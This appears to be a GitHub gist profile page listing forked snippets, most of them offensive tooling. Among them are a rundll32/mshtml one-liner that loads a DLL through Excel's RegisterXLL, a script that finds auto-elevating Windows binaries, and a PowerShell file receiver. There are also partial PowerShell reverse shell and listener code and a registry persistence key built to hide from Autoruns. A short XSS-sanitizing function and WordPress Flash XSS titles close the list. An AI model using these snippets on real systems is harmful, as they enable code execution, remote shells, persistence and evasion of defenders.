Skip to content

Instantly share code, notes, and snippets.

I may be slow to respond.


I may be slow to respond.
View GitHub Profile
sasqwatch / excel.bat
Created Apr 10, 2017 — forked from ryhanson/
Execute DLL via the Excel.Application object's RegisterXLL() method
View excel.bat
REM rundll32 mshtml.dll HTA one-liner command:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
sasqwatch / gist:9a84a57ab4536a631ce9cb8c9740ec56
Created Apr 13, 2017 — forked from dafthack/gist:8aa4ff60cd9352448a372ce1a7b2e27e
Easy Metasploit Install on Windows Subsystem for Linux
View gist:9a84a57ab4536a631ce9cb8c9740ec56
Steps to install Metasploit on Windows 10 using the Windows Subsystem for Linux
1.) Enable Developer Mode
C:\> reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\AppModelUnlock" /t REG_DWORD /f /v "AllowDevelopmentWithoutDevLicense" /d "1"
2.) Enable Windows Subsystem for Linux
C:\> DISM /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux
3.) Reboot
sasqwatch /
Created May 25, 2017 — forked from riyazwalikar/
Python script to find all Windows binaries with autoElevate=True (uses sigcheck obviously)
# Usage: C:\Windows\System32\
# Needs sigcheck.exe in path []
import sys
import os
import glob
import subprocess
if len(sys.argv) < 2:
print "Usage: <PATH>"
sasqwatch / receivefile.ps1
Created May 31, 2017 — forked from staaldraad/receivefile.ps1
Small powershell script to bind to port, accept connection and stream to file. useful for ```cat blah.exe | nc 8080```
View receivefile.ps1
$socket = new-object System.Net.Sockets.TcpListener('', 1080);
if($socket -eq $null){
exit 1;
$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] 2048;
$file = 'c:/afile.exe';
$fileStream = New-Object System.IO.FileStream($file, [System.IO.FileMode]'Create', [System.IO.FileAccess]'Write');
sasqwatch / mini-reverse.ps1
Created May 31, 2017 — forked from staaldraad/mini-reverse.ps1
A reverse shell in Powershell
View mini-reverse.ps1
$socket = new-object System.Net.Sockets.TcpClient('', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
$read = $null;
sasqwatch / mini-reverse-listener.ps1
Created May 31, 2017 — forked from staaldraad/mini-reverse-listener.ps1
A reverse shell listener in powershell
View mini-reverse-listener.ps1
$socket = new-object System.Net.Sockets.TcpListener('', 413);
if($socket -eq $null){
exit 1
$client = $socket.AcceptTcpClient()
write-output "[*] Connection!"
sasqwatch / test.reg
Created Jul 5, 2017 — forked from hasherezade/test.reg
Demo: persistence key not visible for sysinternals autoruns (in a default configuration - read more:
View test.reg
Windows Registry Editor Version 5.00
@="Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \"C:\\ProgramData\\test.exe\""
View XSS Protection in 5 common contexts
* XSS protection function for HTML context only
* @usecases
* <title>use this function if output reflects here or as a content of any HTML tag.</title>
* e.g., <span>use this function if output reflects here</span>
* e.g., <div>use this function if output reflects here</div>
* @description
* Sanitize/Filter < and > so that attacker can not leverage them for JavaScript execution.
sasqwatch /
Created Oct 19, 2017 — forked from cure53/
WordPress SOME bug in plupload.flash.swf
sasqwatch /
Created Oct 19, 2017 — forked from cure53/
WordPress Flash XSS in flashmediaelement.swf